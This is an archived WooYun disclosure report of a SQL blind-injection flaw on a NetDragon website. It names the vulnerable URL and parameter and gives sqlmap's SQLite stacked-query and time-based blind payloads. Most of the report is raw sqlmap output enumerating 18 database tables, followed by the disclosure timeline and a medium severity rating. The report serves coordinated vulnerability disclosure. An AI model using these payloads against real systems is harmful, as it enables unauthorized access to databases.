乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 细节已通知厂商并且等待厂商处理中 2015-10-14: 厂商已经确认,细节仅向厂商公开 2015-10-24: 细节向核心白帽子及相关领域专家公开 2015-11-03: 细节向普通白帽子公开 2015-11-13: 细节向实习白帽子公开 2015-11-28: 细节向公众公开
网龙某站存在SQL盲注漏洞
http://ty.top.99.com/userlevel.aspx?pro=20
Parameter: pro (GET) Type: stacked queries Title: SQLite > 2.0 stacked queries (heavy query - comment) Payload: pro=20;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))-- Type: AND/OR time-based blind Title: SQLite > 2.0 AND time-based blind (heavy query) Payload: pro=20 AND 8822=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))---[22:04:08] [INFO] the back-end DBMS is SQLiteweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: SQLite[22:04:08] [INFO] fetching tables for database: 'SQLite_masterdb'[22:04:08] [INFO] fetching number of tables for database 'SQLite_masterdb'[22:04:08] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [22:04:19] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)[22:04:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 25[22:06:21] [INFO] retrieved: server[22:18:00] [INFO] retrieved: dbbrushtimestam[22:49:55] [ERROR] invalid character detected. retrying..p[22:52:57] [INFO] retrieved: userl[23:06:35] [ERROR] invalid character detected. retrying..evelsort[23:23:44] [INFO] retrieved: sqlite_A[23:38:27] [INFO] retrieved: [23:39:58] [ERROR] invalid character detected. retrying..a[23:44:31] [ERROR] invalid character detected. retrying..sermoneysort[00:09:51] [INFO] retrieved: eudemonsort[00:35:33] [ERROR] invalid character detected. retrying.._All[00:43:41] [INFO] retrieved: eudemonsort_World[01:20:31] [INFO] retrieved: eudemonsort_Area_5[01:55:26] [INFO] retrieved: eudemonsort_Area_6[02:30:48] [INFO] retrieved: eudemonsor[03:05:29] [ERROR] invalid character detected. retrying..' _Area_15[03:24:41] [INFO] retrieved: eudemonsort_Area_16[04:01:03] [INFO] retrieved: eudemonsort_Ar[04:29:23] [INFO] retrieved: [04:30:55] [ERROR] invalid character detected. retrying..eudemonsoqt_S[05:01:12] [ERROR] invalid character detected. retrying..[05:04:20] [ERROR] invalid character detected. retrying..erver_13[05:19:01] [INFO] retrieved: eudemonsort_Server_25[06:01:27] [INFO] retrieved: eudemonsort_Server_68[06:45:20] [INFO] retrieved: eudemonsort_Server_78[07:29:14] [INFO] retrieved: eudemonsort_Serve[08:06:33] [ERROR] invalid character detected. retrying..[08:10:05] [ERROR] invalid character detected. retrying..[08:12:48] [ERROR] invalid character detected. retrying..r_79[08:20:53] [INFO] retrieved: eudemonsort_Server_8[09:04:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request7[09:04:31] [INFO] retrieved: [09:04:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'[09:04:32] [INFO] retrieved: [09:04:32] [INFO] retrieved: [09:04:33] [INFO] retrieved: [09:04:34] [INFO] retrieved: [09:04:34] [INFO] retrieved: [09:04:35] [INFO] retrieved: Database: SQLite_masterdb[18 tables]+-------------------------+| asermoneysort || dbbrushtimestamp || eudemonsoqt_Server_13 || eudemonsor'\x00_Area_15 || eudemonsort_All || eudemonsort_Ar || eudemonsort_Area_16 || eudemonsort_Area_5 || eudemonsort_Area_6 || eudemonsort_Server_25 || eudemonsort_Server_68 || eudemonsort_Server_78 || eudemonsort_Server_79 || eudemonsort_Server_87 || eudemonsort_World || server || sqlite_A || userlevelsort |+-------------------------+
危害等级:中
漏洞Rank:8
确认时间:2015-10-14 09:27
感谢路人甲的支持
暂无
